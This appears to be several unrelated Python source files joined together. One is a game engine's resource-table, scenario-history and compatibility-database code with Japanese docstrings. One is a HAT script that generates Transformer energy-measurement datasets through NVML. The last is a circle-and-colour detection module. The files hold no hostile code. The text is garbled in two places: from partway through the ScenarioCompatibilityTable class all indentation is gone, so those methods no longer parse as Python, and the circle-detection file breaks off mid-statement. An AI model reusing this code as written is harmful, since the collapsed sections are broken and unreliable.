        deffunc: factory for the default value returned on failure.
        nokeyfunc: optional loader invoked for unknown keys.
        """
        self.name = name
        self.dic = init
        self.nokeyfunc = nokeyfunc
        self.deffunc = deffunc
        self.defvalue = None   # cached result of deffunc()
        self.defload = False   # True once defvalue has been created

    def reset(self):
        # Invalidate every cached resource.
        for lazy in self.dic.itervalues():
            lazy.clear()

    def merge(self, d):
        """Copy d's entries for keys this table does not have yet.

        BUGFIX: previously iterated over self.dic (and tested
        membership in self.dic), so nothing was ever merged.
        """
        for key, value in d.dic.items():
            if key not in self.dic:
                self.dic[key] = value

    def __getitem__(self, key):
        self._put_nokeyvalue(key)
        lazy = self.dic.get(key, None)
        if lazy:
            first = not lazy.load
            val = lazy.get_res()
            if lazy.failure:
                if first:
                    # Report each failing resource only once.
                    s = u"リソース [%s/%s] の読み込みに失敗しました。\n" % (self.name, key)
                    sys.stderr.write(s)
                return self.get_defvalue()
            else:
                return val
        else:
            if not self.defload:
                s = u"リソース [%s/%s] が見つかりません。\n" % (self.name, key)
                sys.stderr.write(s)
            # BUGFIX: the default value was computed but never
            # returned (the method fell through and returned None).
            return self.get_defvalue()

    def get_defvalue(self):
        # Create the default value on first use and cache it.
        if not self.defload:
            self.defvalue = self.deffunc()
            self.defload = True
        return self.defvalue

    def _put_nokeyvalue(self, key):
        # Register a lazy loader for unknown keys when nokeyfunc is set.
        if self.nokeyfunc and not key in self.dic:
            self.dic[key] = LazyResource(lambda: self.nokeyfunc(key), (), {})

    def get(self, key, defvalue=None):
        self._put_nokeyvalue(key)
        if key in self.dic:
            return self[key]
        return defvalue

    def set(self, key, func, *args, **kwargs):
        self.dic[key] = LazyResource(func, args, kwargs)

    def __contains__(self, key):
        self._put_nokeyvalue(key)
        return key in self.dic

    def copy(self):
        tbl = ResourceTable(self.name, self.dic.copy(), self.deffunc, self.nokeyfunc)
        tbl.defvalue = self.defvalue
        tbl.defload = self.defload
        return tbl

    def iterkeys(self):
        for key in self.dic.iterkeys():
            yield key

    def is_loaded(self, key):
        self._put_nokeyvalue(key)
        return self.dic[key].load
class RecentHistory(object):
    def __init__(self, tempdir):
        """Track the scenarios opened since startup.

        Each entry is stored as
        (wsn/zip file path, MD5 digest, extraction folder under
        "Data/Temp"); extraction folders are deleted oldest-first once
        the configured limit is exceeded.
        tempdir: directory the scenarios are extracted into.
        """
        self.scelist = []
        temppaths = set()
        limit = cw.cwpy.setting.recenthistory_limit
        fpath = cw.util.join_paths(tempdir, "RecentHistory.xml")
        if os.path.isfile(fpath):
            self.data = cw.data.xml2etree(fpath)
        else:
            # No history yet: create and persist an empty document.
            self.data = cw.data.CWPyElementTree(element=cw.data.make_element("RecentHistory", ""))
            self.data.fpath = fpath
            self.data.write()
        for e in self.data.getfind("."):
            if e.tag == "Scenario":
                path = e.gettext("WsnPath", "")
                temppath = e.gettext("TempPath", "")
                md5 = e.get("md5")
                # Keep only entries whose files still exist.
                if os.path.isfile(path) and os.path.isdir(temppath) and md5:
                    self.scelist.append((path, md5, temppath))
                    temppath = os.path.normpath(temppath)
                    temppath = os.path.normcase(temppath)
                    temppaths.add(temppath)
        if os.path.isdir(tempdir):
            # Remove stale extraction folders no history entry refers to.
            for name in os.listdir(tempdir):
                path = cw.util.join_paths(tempdir, name)
                if os.path.isdir(path):
                    path = os.path.normpath(path)
                    path = os.path.normcase(path)
                    if not path in temppaths:
                        cw.util.remove(path)
        self.set_limit(limit)

    def update_scenariopath(self, from_normpath, to_path):
        """Rewrite entries whose normalized path equals from_normpath
        to point at to_path, dropping duplicates (and their extraction
        folders), then persist the history.
        """
        seq = []
        s = set()
        for path, md5, temppath in self.scelist:
            normpath2 = os.path.normcase(os.path.normpath(os.path.abspath(path)))
            if normpath2 == from_normpath:
                if normpath2 in s:
                    # Duplicate of an already-rewritten entry.
                    cw.util.remove(temppath)
                    continue
                else:
                    s.add(normpath2)
                path = to_path
                if os.path.isfile(from_normpath):
                    md5 = cw.util.get_md5(from_normpath)
                elif os.path.isfile(to_path):
                    md5 = cw.util.get_md5(to_path)
            seq.append((path, md5, temppath))
        self.scelist = seq
        self.write()

    def write(self):
        # Persist the scenario history: rebuild the XML tree from
        # scratch and write it out.
        data = self.data.getroot()
        while len(data):
            data.remove(data[-1])
        for path, md5, temppath in self.scelist:
            e_sce = cw.data.make_element("Scenario", "", {"md5": str(md5)})
            e = cw.data.make_element("WsnPath", path)
            e_sce.append(e)
            e = cw.data.make_element("TempPath", temppath)
            e_sce.append(e)
            data.append(e_sce)
        self.data.write()

    def set_limit(self, value):
        """
        Set the maximum number of history entries.
        Entries beyond the limit are removed oldest-first.
        """
        self.limit = value
        if self.limit and len(self.scelist) > self.limit:
            while len(self.scelist) > self.limit:
                self.remove(save=False)
            self.write()

    def moveend(self, path):
        """
        Move the entry for path to the end (most recent position).
        """
        seq = [i for i in self.scelist if i[0] == path]
        for i in seq:
            self.scelist.remove(i)
            self.scelist.append(i)
        self.write()

    def append(self, path, temppath, md5=None):
        """
        path: path of the wsn/zip file.
        temppath: folder under "Data/Yado/<Yado>/Temp" it was
        extracted to.
        Once the limit is exceeded, old entries are removed first.
        """
        path = path.replace("\\", "/")
        if not md5:
            md5 = cw.util.get_md5(path)
        temppath = temppath.replace("\\", "/")
        # Re-adding an existing path moves it to the most-recent slot.
        self.remove(path, save=False)
        self.scelist.append((path, md5, temppath))
        while len(self.scelist) > self.limit:
            self.remove(save=False)
        self.write()

    def remove(self, path="", save=True):
        """
        path: wsn/zip file path whose entry should be removed.
        When empty, the oldest (first) entry is removed instead.
        The extraction folder is deleted along with the entry.
        """
        if not path:
            cw.util.remove(self.scelist[0][2])
            self.scelist.remove(self.scelist[0])
        else:
            path = path.replace("\\", "/")
            seq = [i for i in self.scelist if i[0] == path]
            for i in seq:
                cw.util.remove(i[2])
                self.scelist.remove(i)
        if save:
            self.write()

    def check(self, path, md5=None):
        """
        path: wsn/zip file path to look up.
        If the file was already extracted into "Data/Temp" with a
        matching MD5, return the extraction folder path; stale entries
        encountered on the way are dropped. Returns None otherwise.
        """
        path = path.replace("\\", "/")
        if not md5:
            md5 = cw.util.get_md5(path)
        seq = []
        seq.extend(self.scelist)
        for i_path, i_md5, i_temppath in seq:
            if not os.path.isfile(i_path) or not os.path.isdir(i_temppath):
                self.remove(i_path)
                continue
            if i_path == path and i_md5 == md5:
                return i_temppath
        return None
class SystemCoupons(object):
    """System coupons treated specially by the coupon-select branch.
    Used, among other things, for engine version detection from
    scenarios. CardWirth's own "_1".."_6" and "@MP3" are not included.
    """
    def __init__(self, fpath=u"Data/SystemCoupons.xml", data=None):
        # _normal holds exact coupon names, _regexes compiled patterns.
        # _ats stays True while every registered coupon starts with u"@".
        self._normal = set()
        self._regexes = []
        self._ats = True
        if data is None and os.path.isfile(fpath):
            data = cw.data.xml2element(path=fpath)
        if data is None:
            return
        for e in data:
            if self._ats and not e.text.startswith(u"@"):
                self._ats = False
            if e.getbool(".", "regex", False):
                self._regexes.append(re.compile(e.text))
            else:
                self._normal.add(e.text)

    def match(self, coupon):
        """Return True when coupon is one of the system coupons."""
        if self._ats and not coupon.startswith(u"@"):
            # Fast path: only "@..." coupons are registered.
            return False
        if coupon in self._normal:
            return True
        return any(r.match(coupon) for r in self._regexes)
class ScenarioCompatibilityTable(object):
"""互換性データベース。
*.wsmまたは*.widファイルのMD5ダイジェストをキーに、
本来そのファイルが再生されるべきCardWirthのバージョンを持つ。
ここでの判断の優先順位はシナリオのmode.iniより低い。
互換動作の判断は、
(1)メッセージ表示時の話者(キャストまたはカード)→(2)使用中のカード
→(3)エリア・バトル・パッケージ→(4)シナリオ本体
の優先順位で行う。このデータベースの情報はいずれにも適用される。
通常シナリオを互換モードで動かすにはSummary.wsmのMD5値をキーに
バージョンを登録すればよい。
Unix系列ではmd5コマンドで取得できるが、普通CardWirthのユーザは
Windowsユーザであるため、PowerShellを使う事になる。例えば:
$ [string]::concat(([Security.Cryptography.MD5]::Create().ComputeHash((gi Summary.wsm).OpenRead())|%{$_.ToString('x2')}))
Pythonでは次のようにして取得できる。
>>> import hashlib
>>> hashlib.md5(open("Summary.wsm", "rb").read()).hexdigest()
"""
def __init__(self):
    """Load "Data/Compatibility.xml" (when present) into self.table,
    keyed by MD5 digest of the target file.
    """
    self.table = {}
    if os.path.isfile("Data/Compatibility.xml"):
        data = cw.data.xml2element(path="Data/Compatibility.xml")
        for e in data:
            key = e.get("md5", "")
            zindexmode = e.getattr(".", "zIndexMode", "")
            vanishmembercancellation = e.getbool(".", "enableVanishMemberCancellation", False)
            if key and (e.text or zindexmode or vanishmembercancellation):
                # NOTE(review): entries here are 3-tuples, while
                # merge_versionhints/from_basehint use 5 fields —
                # confirm table hints never reach merge_versionhints.
                self.table[key] = (e.text, zindexmode, vanishmembercancellation)
def get_versionhint(self, fpath=None, filedata=None):
"""fpathのファイル内容またはfiledataから、
本来そのファイルが再生されるべきCardWirthの
バージョンを取得する。
"""
if filedata:
key = hashlib.md5(filedata).hexdigest()
else:
key = cw.util.get_md5(fpath)
return self.table.get(key, None)
def lessthan(self, versionhint, currentversion):
"""currentversionがversionhint以下であればTrueを返す。"""
if not currentversion:
return False
if not currentversion[0]:
return False
if not versionhint:
return False
try:
return float(currentversion[0]) <= float(versionhint)
except:
return False
def zindexmode(self, currentversion):
"""メニューカードをプレイヤーカードより前に配置するモードで
あればTrueを返す。
"""
if not currentversion:
return False
if currentversion[1]:
try:
return float(currentversion[1]) <= float("1.20")
except:
return False
else:
return self.lessthan("1.20", currentversion)
def enable_vanishmembercancellation(self, currentversion):
"""パーティメンバが再配置される前であれば
対象消去がキャンセルされるモードであればTrueを返す。
"""
if not currentversion:
return False
return currentversion[2]
def merge_versionhints(self, hint1, hint2):
"""hint1を高優先度としてhint2とマージする。"""
if not hint1:
return hint2
if not hint2:
return hint1
engine = hint1[0]
if not engine:
engine = hint2[0]
zindexmode = hint1[1]
if not zindexmode:
zindexmode = hint2[1]
vanishmembercancellation = hint1[2]
if not vanishmembercancellation:
vanishmembercancellation = hint2[2]
gossiprestration = hint1[3]
if not gossiprestration:
gossiprestration = hint2[3]
compstamprestration = hint1[4]
if not compstamprestration:
compstamprestration = hint2[4]
return (engine, zindexmode, vanishmembercancellation, gossiprestration, compstamprestration)
def from_basehint(self, basehint):
"""basehintから複合情報を生成する。"""
if not basehint:
return None
return (basehint, "", False, False, False)
def to_basehint(self, versionhint):
"""複合情報versionhintから最も基本的な情報を取り出す。"""
if versionhint:
return versionhint[0] if versionhint[0] else ""
else:
return ""
def read_modeini(self, fpath):
"""クラシックなシナリオのmode.iniから互換性情報を読み込む。
互換性情報が無いか、読込に失敗した場合はNoneを返す。
"""
try:
conf = ConfigParser.SafeConfigParser()
conf.read(fpath)
try:
engine = conf.get("Compatibility", "engine")
except:
engine = ""
try:
zindexmode = conf.get("Compatibility", "zIndexMode")
except:
zindexmode = ""
try:
vanishmembercancellation = conf.get("Compatibility", "enableVanishMemberCancellation")
vanishmembercancellation = cw.util.str2bool(vanishmembercancellation)
except:
vanishmembercancellation = False
if engine or zindexmode or vanishmembercancellation:
return (engine, zindexmode, vanishmembercancellation)
except Exception:
cw.util.print_ex()
return None
|
energy_dataset.py | # HAT: Hardware-Aware Transformers for Efficient Natural Language Processing
# Hanrui Wang, Zhanghao Wu, Zhijian Liu, Han Cai, Ligeng Zhu, Chuang Gan and Song Han
# The 58th Annual Meeting of the Association for Computational Linguistics (ACL), 2020.
# Paper: https://arxiv.org/abs/2005.14187
# Project page: https://hanruiwang.me/project_pages/hat/
import torch
import time
import pdb
import numpy as np
from fairseq import checkpoint_utils, distributed_utils, options, tasks, utils
from tqdm import tqdm
import threading
import pynvml
delay = 0.1
def measureEnergy(runningThread, delay):
    """Sample GPU 1 power draw ten times at `delay`-second intervals and
    return the approximate energy as sum(power samples) * delay.

    NOTE(review): `runningThread` is currently unused -- the commented-out
    loop condition suggests sampling was meant to continue while that
    thread is alive; confirm the fixed 10-sample loop is intentional.
    """
    pynvml.nvmlInit()
    handle = pynvml.nvmlDeviceGetHandleByIndex(1)
    samples = []
    # while(~runningThread.is_alive()):
    for _ in range(10):
        samples.append(pynvml.nvmlDeviceGetPowerUsage(handle))
        time.sleep(delay)
    pynvml.nvmlShutdown()
    energy = np.sum(samples) * delay
    print(samples)
    print(energy)
    return energy
def main(args):
    """Generate an energy-measurement dataset for the HAT energy predictor.

    Samples args.lat_dataset_size random SubTransformer configurations,
    measures encoder and decoder energy over args.latiter runs each (GPU
    power is sampled via NVML while the forward pass runs in a thread),
    and appends one CSV row per configuration to args.lat_dataset_path.
    """
    utils.import_user_module(args)
    assert args.max_tokens is not None or args.max_sentences is not None, \
        'Must specify batch size either with --max-tokens or --max-sentences'
    # Initialize CUDA and distributed training
    if torch.cuda.is_available() and not args.cpu:
        torch.cuda.set_device(args.device_id)
    torch.manual_seed(args.seed)
    # Print args
    print(args)
    # Setup task
    task = tasks.setup_task(args)
    # Build model
    model = task.build_model(args)
    print(model)
    # specify the length of the dummy input for profile
    # for iwslt, the average length is 23, for wmt, that is 30
    dummy_sentence_length_dict = {'iwslt': 23, 'wmt': 30}
    if 'iwslt' in args.arch:
        dummy_sentence_length = dummy_sentence_length_dict['iwslt']
    elif 'wmt' in args.arch:
        dummy_sentence_length = dummy_sentence_length_dict['wmt']
    else:
        raise NotImplementedError
    # Dummy source: token 2 followed by token 7s; decoder input is mirrored.
    dummy_src_tokens = [2] + [7] * (dummy_sentence_length - 1)
    dummy_prev = [7] * (dummy_sentence_length - 1) + [2]
    # for energy predictor: energy dataset generation
    with open(args.lat_dataset_path, 'w') as fid:
        src_tokens_test = torch.tensor([dummy_src_tokens], dtype=torch.long)
        src_lengths_test = torch.tensor([dummy_sentence_length])
        prev_output_tokens_test_with_beam = torch.tensor([dummy_prev] * args.beam, dtype=torch.long)
        if args.latcpu:
            model.cpu()
            print('Measuring model energy on CPU for dataset generation...')
        elif args.latgpu:
            model.cuda()
            src_tokens_test = src_tokens_test.cuda()
            src_lengths_test = src_lengths_test.cuda()
            prev_output_tokens_test_with_beam = prev_output_tokens_test_with_beam.cuda()
            src_tokens_test.get_device()
            print('Measuring model energy on GPU for dataset generation...')
            # CUDA events give accurate on-device timing for the GPU path.
            start = torch.cuda.Event(enable_timing=True)
            end = torch.cuda.Event(enable_timing=True)
        # CSV header: config features followed by energy statistics.
        feature_info = utils.get_feature_info()
        fid.write(','.join(feature_info) + ',')
        energy_info = ['energy_mean_encoder', 'energy_mean_decoder', 'energy_std_encoder', 'energy_std_decoder']
        fid.write(','.join(energy_info) + '\n')
        for i in range(args.lat_dataset_size):
            print(i)
            # Draw one random SubTransformer config from the SuperTransformer.
            config_sam = utils.sample_configs(utils.get_all_choices(args), reset_rand_seed=False, super_decoder_num_layer=args.decoder_layers)
            features = utils.get_config_features(config_sam)
            fid.write(','.join(map(str, features)) + ',')
            model.set_sample_config(config_sam)
            # dry runs
            for _ in range(5):
                encoder_out_test = model.encoder(src_tokens=src_tokens_test, src_lengths=src_lengths_test)
            encoder_energies = []
            print('Measuring encoder for dataset generation...')
            for _ in tqdm(range(args.latiter)):
                if args.latgpu:
                    start.record()
                elif args.latcpu:
                    start = time.time()
                # Sample GPU power via NVML while the encoder forward pass
                # runs in a separate thread.
                # NOTE(review): NVML device index 1 is hard-coded while torch
                # uses args.device_id -- confirm both refer to the same GPU.
                powers = []
                pynvml.nvmlInit()
                handle = pynvml.nvmlDeviceGetHandleByIndex(1)
                thread_encoder = threading.Thread(target=model.encoder, args=(src_tokens_test, src_lengths_test))
                thread_encoder.start()
                while(thread_encoder.is_alive()):
                    powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
                    time.sleep(0.001)
                pynvml.nvmlShutdown()
                power = np.average(powers)
                if args.latgpu:
                    end.record()
                    torch.cuda.synchronize()
                    encoder_energies.append(start.elapsed_time(end)*power/1000000) #the result is J
                    if not args.latsilent:
                        print('Encoder one run on GPU (for dataset generation): ', start.elapsed_time(end)*power/1000000)
                elif args.latcpu:
                    end = time.time()
                    encoder_energies.append((end - start) * power / 1000)
                    if not args.latsilent:
                        print('Encoder one run on CPU (for dataset generation): ', (end - start)*power/1000)
            # only use the 10% to 90% energies to avoid outliers
            encoder_energies.sort()
            encoder_energies = encoder_energies[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
            print(f'Encoder energy for dataset generation: Mean: {np.mean(encoder_energies)} J; \t Std: {np.std(encoder_energies)} J')
            # Expand the encoder output across the beam for the decoder runs.
            bsz = 1
            new_order = torch.arange(bsz).view(-1, 1).repeat(1, args.beam).view(-1).long()
            if args.latgpu:
                new_order = new_order.cuda()
            encoder_out_test_with_beam = model.encoder.reorder_encoder_out(encoder_out_test, new_order)
            # dry runs
            for _ in range(5):
                model.decoder(prev_output_tokens=prev_output_tokens_test_with_beam,
                              encoder_out=encoder_out_test_with_beam)
            # decoder is more complicated because we need to deal with incremental states and auto regressive things
            decoder_iterations_dict = {'iwslt': 23, 'wmt': 30}
            if 'iwslt' in args.arch:
                decoder_iterations = decoder_iterations_dict['iwslt']
            elif 'wmt' in args.arch:
                decoder_iterations = decoder_iterations_dict['wmt']
            decoder_energies = []
            print('Measuring decoder for dataset generation...')
            for _ in tqdm(range(args.latiter)):
                if args.latgpu:
                    start.record()
                elif args.latcpu:
                    start = time.time()
                powers = []
                pynvml.nvmlInit()
                handle = pynvml.nvmlDeviceGetHandleByIndex(1)
                incre_states = {}
                # Auto-regressive generation: one decoder step per target token.
                for k_regressive in range(decoder_iterations):
                    thread_decoder = threading.Thread(target=model.decoder, args=((prev_output_tokens_test_with_beam[:, :k_regressive + 1], encoder_out_test_with_beam, incre_states)))
                    thread_decoder.start()
                    while(thread_decoder.is_alive()):
                        powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
                        time.sleep(0.001)
                pynvml.nvmlShutdown()
                # print(powers)
                power = np.average(powers)
                if args.latgpu:
                    end.record()
                    torch.cuda.synchronize()
                    decoder_energies.append(start.elapsed_time(end)*power/1000000) #the result is J
                    if not args.latsilent:
                        print('Decoder one run on GPU (for dataset generation): ', start.elapsed_time(end)*power/1000000)
                elif args.latcpu:
                    end = time.time()
                    decoder_energies.append((end - start) * power / 1000)
                    if not args.latsilent:
                        print('Decoder one run on CPU (for dataset generation): ', (end - start)*power)
            # only use the 10% to 90% energies to avoid outliers
            decoder_energies.sort()
            decoder_energies = decoder_energies[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
            print(decoder_energies)
            print(f'Decoder energy for dataset generation: Mean: {np.mean(decoder_energies)} J; \t Std: {np.std(decoder_energies)} J')
            lats = [np.mean(encoder_energies), np.mean(decoder_energies), np.std(encoder_energies), np.std(decoder_energies)]
            fid.write(','.join(map(str, lats)) + '\n')
def cli_main():
    """Build the HAT training/generation parser, register the
    energy-measurement flags, and dispatch to main()."""
    parser = options.get_training_parser()
    # Registration order is preserved so --help output stays identical.
    extra_flags = [
        ('--latgpu', dict(action='store_true', help='measure SubTransformer energy on GPU')),
        ('--latcpu', dict(action='store_true', help='measure SubTransformer energy on CPU')),
        ('--latiter', dict(type=int, default=300, help='how many iterations to run when measure the energy')),
        ('--latsilent', dict(action='store_true', help='keep silent when measure energy')),
        ('--lat-dataset-path', dict(type=str, default='./energy_dataset/lat.tmp', help='the path to write energy dataset')),
        ('--lat-dataset-size', dict(type=int, default=200, help='number of data points for the dataset')),
    ]
    for flag, kwargs in extra_flags:
        parser.add_argument(flag, **kwargs)
    options.add_generation_args(parser)
    args = options.parse_args_and_arch(parser)
    if args.latcpu:
        # CPU measurement implies no CUDA device and no fp16.
        args.cpu = True
        args.fp16 = False
    if args.pdb:
        pdb.set_trace()
    main(args)
# Run the CLI entry point only when executed as a script (not on import).
if __name__ == '__main__':
    cli_main()
|
cv.py | #!/usr/bin/env python3
import numpy, sys, io, os, time, threading
import scipy.misc
from skimage import color, transform
from skimage.io import imread
from skimage.util import img_as_ubyte
from skimage.feature import canny, peak_local_max, corner_fast, corner_foerstner, corner_harris, corner_kitchen_rosenfeld, corner_moravec, corner_shi_tomasi
from skimage.transform import hough_ellipse, hough_circle, rescale
from skimage.draw import ellipse_perimeter, circle_perimeter
from skimage.filters import roberts, sobel, scharr, prewitt
def detect_colored_circles(rgb_img, radius_range, hsv_color_ranges, debug=False, counter=0):
    """
    Detects circles filled with color contained in hsv_color_ranges.

    Pipeline: grayscale -> Canny edges -> circular Hough transform ->
    per-radius peak selection -> color classification of circle centers.
    Intermediate images are saved via save_image() for inspection.

    parameters: rgb_img          -- RGB image array
                radius_range     -- (min_radius, max_radius) in pixels
                hsv_color_ranges -- {color_name: (hsv_min, hsv_max)}
                debug, counter   -- verbose output / filename suffix
    Returns: Collection of circle centers for each color as dictionary,
             or None when at least one color was not detected.
    """
    min_radius, max_radius = radius_range
    start_all = time.time()
    save_image('0_photo_'+str(counter), rgb_img)
    # convert image to gray
    print('convert rgb image to grayscale ...')
    start = time.time()
    gray_img = rgb2gray(rgb_img)
    print('finished, duration: ',time.time()-start,'seconds')
    print()
    # find edges in image
    print('find edges in grayscale image ...')
    start = time.time()
    # Canny parameters were tuned by hand; the alternatives below were tried
    # and kept for reference.
    edges_img = canny(gray_img, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
    #edges_img = corner_fast(gray_img, n=9, threshold=1.2)
    #edges_img = corner_foerstner(gray_img)[0]
    #edges_img = corner_harris(gray_img, method='k', k=0.05, eps=1e-06, sigma=1)
    #edges_img = corner_kitchen_rosenfeld(gray_img, mode='constant', cval=0)
    #edges_img = corner_moravec(gray_img, window_size=1)
    #edges_img = corner_shi_tomasi(gray_img, sigma=0.1)
    #edges_img = roberts(gray_img)
    #edges_img = sobel(gray_img)
    #edges_img = scharr(gray_img)
    #edges_img = prewitt(gray_img)
    print('finished, duration: ',time.time()-start,'seconds')
    save_image('1_edges_'+str(counter), edges_img)
    print()
    # find circles from edge_image
    print('find circles in image ...')
    start = time.time()
    hough_radii, hough_res = find_circles(edges_img, min_radius, max_radius)
    print('finished, duration: ',time.time()-start,'seconds')
    print("#Circles: ", count_circles_of_2d_array(hough_res))
    print()
    # keep only the strongest candidates per radius
    print('eliminating with peak_local_max ...')
    start = time.time()
    centers, accums, radii = circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16)
    print('finished, duration: ',time.time()-start,'seconds')
    print("#Circles: ", len(accums))
    print()
    # hsv color debug
    # NOTE(review): debug_points is not defined in this module view --
    # confirm it exists before calling with debug=True.
    if debug: debug_points(centers, accums, rgb_img)
    print('finding coordinates by color of circles ...')
    start = time.time()
    color_coords_dictionary, debug_img = find_circles_by_color(centers, accums, radii, rgb_img, hsv_color_ranges, debug)
    print('finished, duration: ',time.time()-start,'seconds')
    print('#Circles: ',count_circles_of_dictionary_with_arrays(color_coords_dictionary))
    color_not_found = False
    for key, array in color_coords_dictionary.items():
        print('\t',key,':\t',len(array))
        if len(array) == 0:
            color_not_found = True
        else:
            # Print the HSV value of every matched center plus the average,
            # useful for tuning hsv_color_ranges.
            arr = []
            for i in range(len(array)):
                coord = array[i]
                rgb = rgb_img[coord[0], coord[1]]
                hsv = rgb2hsv((rgb[0], rgb[1], rgb[2]))
                arr.append(hsv)
                print('\t',hsv)
            avg = numpy.average(arr, axis=0)
            print('avg',avg)
    print()
    save_image('2_detected_circles_'+str(counter), debug_img)
    print()
    print('total duration: ',time.time()-start_all,'seconds')
    print()
    if color_not_found:
        print('less than 4 corners for calibration detected, quitting')
        return None
    color_coords = calc_coordinate_averages(color_coords_dictionary)
    print('Coordiantes: ',color_coords)
    return color_coords
def detect_colored_circles_no_prints(rgb_img, radius_range, hsv_color_ranges):
    """Silent variant of detect_colored_circles: same pipeline, no console
    output and no debug images.

    Returns None when at least one color has no detected circle, otherwise
    a dictionary {color: (x, y)} of averaged circle centers.
    """
    lo, hi = radius_range
    gray = rgb2gray(rgb_img)
    edges = canny(gray, sigma=15.0, low_threshold=0.55, high_threshold=0.8)
    candidate_radii, hough_spaces = find_circles(edges, lo, hi)
    centers, qualities, radii = circles_per_radius(candidate_radii, hough_spaces, number_circles_per_radius=16)
    by_color, _ = find_circles_by_color(centers, qualities, radii, rgb_img, hsv_color_ranges, False)
    # Bail out if any color ended up with no circle at all.
    if any(len(points) == 0 for points in by_color.values()):
        return None
    return calc_coordinate_averages(by_color)
def find_circles(edges_img, min_radius, max_radius):
    """Run a circular Hough transform over every integer radius in
    [min_radius, max_radius).

    Returns: (candidate radii, one Hough accumulator image per radius)
    """
    candidate_radii = numpy.arange(min_radius, max_radius, 1)
    accumulators = hough_circle(edges_img, candidate_radii)
    return (candidate_radii, accumulators)
def circles_per_radius(hough_radii, hough_res, number_circles_per_radius=16):
    """
    Rate circle candidates by the intensity of their Hough-space peaks and
    keep the best `number_circles_per_radius` circles for every radius.

    Returns: (centers, accums, radii) -- accums holds the peak intensity,
    i.e. the quality score of the circle at the matching index.
    """
    centers = []
    accums = []
    radii = []
    # One Hough accumulator image per candidate radius.
    for radius, accumulator in zip(hough_radii, hough_res):
        # The strongest local maxima are the most likely circle centers.
        peaks = peak_local_max(accumulator, num_peaks=number_circles_per_radius)
        centers.extend(peaks)
        # Accumulator value at each (y, x) peak = quality of that circle.
        accums.extend(accumulator[peaks[:, 0], peaks[:, 1]])
        radii.extend([radius] * number_circles_per_radius)
    return (centers, accums, radii)
def find_circles_by_color(centers, accums, radii, rgb_img, hsv_color_ranges, debug):
    """
    Assign detected circle centers to the given HSV color ranges.

    Returns: ({color: [center, ...]}, debug image with circle outlines)
    """
    height, width = len(rgb_img), len(rgb_img[0])
    overlay = numpy.zeros((height, width, 3), dtype=numpy.uint8)  # black canvas
    coords = {name: [] for name in hsv_color_ranges}
    # Visit candidates from best to worst quality score.
    for idx in numpy.argsort(accums)[::-1][:]:
        center_y, center_x = centers[idx]
        pixel_color = rgb_img[center_y, center_x]
        # identify_color returns the matching color name or None.
        matched = identify_color(pixel_color, hsv_color_ranges, debug)
        if matched is not None:
            coords[matched].append(centers[idx])
            overlay = add_circle_outlines_to_image(overlay, center_y, center_x, radii[idx], pixel_color)
        elif debug:
            # draw also all circles not matching the specific colors, but in dark gray
            overlay = add_circle_outlines_to_image(overlay, center_y, center_x, radii[idx], (255,255,255))
            print('@ coord (x,y)', center_x, ', ', center_y, '\n')
    return (coords, overlay)
def calc_coordinate_averages(coord_arrays):
    """
    Average the coordinate tuples stored per color key.

    parameter: dictionary {color: [(y, x), ...]}
    returns:   dictionary {color: (x, y)}  -- note the axis swap!
    """
    # TODO: Sort out all circles not matching specific pixel range
    result = {}
    for key, points in coord_arrays.items():
        mean_point = numpy.average(points, axis=0)
        # Swap from (y, x) input order to (x, y) output order.
        result[key] = (int(mean_point[1]), int(mean_point[0]))
    return result
#########################################################################################################
#########################################################################################################
def add_circle_outlines_to_image(image, center_y, center_x, radius, color):
    """
    Draw the outline of one circle onto `image` (in place) and return it.
    Coordinates follow the (y, x) convention used by skimage.
    """
    img_shape = (len(image), len(image[0]))
    # Bresenham rasterization, clipped to the image bounds via `shape`.
    rows, cols = circle_perimeter(center_y, center_x, radius, method='bresenham', shape=img_shape)
    image[rows, cols] = color
    return image
def add_rect_outlines_to_image(image, upper_left, lower_right, color):
    """
    Draw the axis-aligned rectangle outline spanning upper_left..lower_right.

    parameters: image       -- 2-D indexable image; a numpy array is expected
                               (the original code already used `image[y, x]`)
                upper_left  -- (x, y) of the top-left corner (inclusive)
                lower_right -- (x, y) of the bottom-right corner (the
                               bottom-right pixel itself is excluded by the
                               half-open ranges, matching previous behavior)
                color       -- value assigned to every outline pixel
    Returns the image (also modified in place), for consistency with
    add_circle_outlines_to_image.
    """
    height, width = len(image), len(image[0])

    def _plot(x, y):
        # Clip silently: pixels outside the image are simply skipped.
        if 0 <= y < height and 0 <= x < width:
            # Unified numpy-style indexing; the original mixed image[y][x]
            # and image[y, x], which broke for plain lists halfway through.
            image[y, x] = color

    # Vertical edges (left and right).
    for y in range(upper_left[1], lower_right[1]):
        _plot(upper_left[0], y)
        _plot(lower_right[0], y)
    # Horizontal edges (top and bottom).
    for x in range(upper_left[0], lower_right[0]):
        _plot(x, upper_left[1])
        _plot(x, lower_right[1])
    return image
def identify_color(pixel_color, hsv_color_ranges, debug=False):
    """
    This method compares colors to red, green, blue and white
    using the HSV color model to be able to detect colors more or
    less reliable, even for various light situations from a photo.

    parameters: pixel_color      -- triple of rgb values
                hsv_color_ranges -- {name: ((h,s,v)_min, (h,s,v)_max)}
                debug            -- print classification details
    returns: string of color ('blue', 'green', 'red', 'white') or None
    """
    hsv = rgb2hsv(pixel_color)
    couldbe = {}
    for color, color_range in hsv_color_ranges.items():  # for every hsv color range
        couldbe[color] = 0
        for i in range(3):  # for every channel (0=h, 1=s, 2=v)
            # BUGFIX: was `i is 0` -- identity comparison of ints relies on
            # CPython small-int interning; use value equality instead.
            if i == 0 and color_range[0][i] > color_range[1][i]:
                # hue range wraps around (red): accept [0, max] or [min, 1]
                if (0. <= hsv[i] <= color_range[1][i]) or (color_range[0][i] <= hsv[i] <= 1.):
                    couldbe[color] += 1
            else:
                # plain interval test for the channel
                if color_range[0][i] <= hsv[i] <= color_range[1][i]:
                    couldbe[color] += 1
    # save all colors where score in couldbe is 3, so all channels have matched;
    # multiple matches should not happen, but this is good for debugging the
    # hsv color ranges
    possible_colors = [color for color, weight in couldbe.items() if weight == 3]
    if len(possible_colors) == 0:
        if debug: print('COLOR: matches no color\t\t',pixel_color, ' (rgb)\t\t',hsv,'(hsv)')
        return None
    elif len(possible_colors) == 1:
        if debug: print('COLOR: should be', possible_colors[0], '\t\t',pixel_color, ' (rgb)')
        return possible_colors[0]
    elif len(possible_colors) > 1:
